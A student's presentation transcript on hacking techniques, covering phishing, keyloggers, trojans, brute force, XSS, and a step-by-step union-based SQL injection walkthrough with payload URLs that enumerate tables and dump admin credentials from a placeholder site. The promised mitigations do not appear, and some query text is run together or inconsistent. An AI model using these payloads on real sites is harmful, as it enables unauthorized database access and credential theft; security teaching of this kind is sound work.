I presented this in my graduation college in-front of my classmates wherein i described various types os hacking techniques used by the "Bad Guys" and also how to mitigate them.

1. Presentation on Hacking
Techniques By
Ishaq Mohammed(15#4Q)

3. Hacking:
The simple definition of hacking is gaining an unauthorized
access to a computer system,network or servers.

5. Some Hacking techniques to hack a Facebook or a Gmail
account :
1. Phishing
2. Key Loggers
3.Trojans/Backdoors

6. What is Phishing ?
It's a way of hacking where a hacker tricks his victim by making him/her login to a
website which is made to look identical to the legitimate one.After a victim login, this
fake website will acquire his information (username and password) and send it to a
hacker.

7. Key Loggers

8. 1.Trojans are piece of code.
2.Meant for the remote
administration purpose.
3.It may or may not harm your
computer.
Trojans/Backdoors

9. WebSite Hacking
1.SQL Injection (SQLi)
2.Cross Side Scripting(XSS)
(SQLi) <XSS>

10. SQL Injection
•SQL Injection is a method of injecting SQL queries into the
website,by injecting our malicious queries hacker can easily
1.By pass the authentication
2.Grab the Structure of the database
3.Grab the sensitive data

11. •Basically we will divide our SQL
injection Methods into different types,
1.Authentication Bypass
2.Union Based Injection
SQLi methods

12. Authentication Bypass
To login to the admin login.php page,whenever thea dmin
will enter the admin id and password,a query will executed
on admin login table,the query will look somewhat like,
select * from admin login where admin id=‘<value>’ and
pass=‘<value>’;
i.e. : select * from admin login where admin id=‘admin’ and
pass=‘admin pass

13. SQL injection is a code injection technique, used to attack data-
driven applications, in which malicious SQL statements are
inserted into an entry field for execution (e.g. to dump the
database contents to the attacker).
Union Based Injection

14. S_ID S_Name
001 Andy
002 Ishaq
003 Pm
004 Sid
S_ID S_Name
001 Akshay
002 Abhi
003 Rahul
004 Tom
F.Y. (IT)
S.Y. (IT)

15. E.g.: SELECT S_Name FROM
F.Y.(IT)
UNION
SELECT S_Name FROM S.Y.(IT)
•The result-set will look like this

16. 1) Find something=something in
url,i.e.:id=4,page=2,catid=1,info=9,product=car
http://www.site.com/product.php?id=4
Steps :
After finding
something=something,Apply‘(SingleQuote),
it willlook somewhat like,
http://www.site.com/product.php?id=4’

18. 2) orderby1--(Remove‘)
http://www.site.com/product.php?id=4order by
1--
If the page is loading normally,you need to
proceed to order by2--
Then order by3--until you see some error or
blank page or data missing

19. Here,orderby5--
giveserror,sothiserrormeansthereare4columns
whichisusedtodisplaythedata.
Here,order by 5--gives error,so this error means
there are 4 columns which is used to display the
data.

20. 3) Union select 1,2,3,4--
:http://www.site.com/product.php?id=4union
select1,2,3,4--
The visible column number is 2 so we can replace.

21. 4) Check version OR database OR user by applying,
union select 1,database(),3,4 --
http://www.site.com/product.php?id=4 union
select1,database(),3,4--

22. 5) To see the table names,
http://www.site.com/product.php?id=5 union select
1,2,table_name,4 from information_schema.tables --

23. 6) Find the column names of the table
http://www.site.com/products.php?id=5 union select
1,2,column_name,4,5 from
information_schema.columnswhere
table_name=‘tbl_admin’ –

24. 7) Get the data from the database.
http://www.site.com/products.php?id=5 union select 1,2,adminid,4
from admin --

25. 1)A type of vulnerability typically found inWeb applications.
2)Enables to inject client-side script into Web pages viewed
by other users.

26. 1. DOM-Based Attack:-
A DOM-Based attack is a more advanced attack where the
attackers payload (malicious script) is executed as a result
of modifying the DOM Environment in the slave's browser
by the original client side script, this causes the client side
code to run in an unexpected manner.

27. 2. Persistent XSS Attack:-
A persistent XSS attack is a method in which the
attackers payload is permanent to the
servers code and will remain there for every user to see
until a server admin removes it.

28. 3. Non-Persistent XSS Attack:-
A non-persistent XSS attack is a method in which the
attackers payload is not permanent, meaning it doesn't
effect the servers internal code. An example of this would
be a link that has a Non-Persistent attack embedded into
it.

29. What we need to perform it?
I.A vulnerable website
Let’sAttack
II.A textbox (may be searchbox or any text box) in the site

30. let’s try putting in the most known, BASIC query of all time.
Code:-
<script>alert(“XSS”)</script>

31. We will get the result of our attack by the XSS code like a
popup box… Like this…

32. Any password can be cracked using Brute-force attack.
Brute-force attacks try every possible combinations of
numbers, letters and special characters until the
right password is match.
BruteForce Attack

33. Credits : 1) Lucideus Tech
2) Tyagi Sir
3)Aman Sir
4) Andy
5) Ofcourse me :P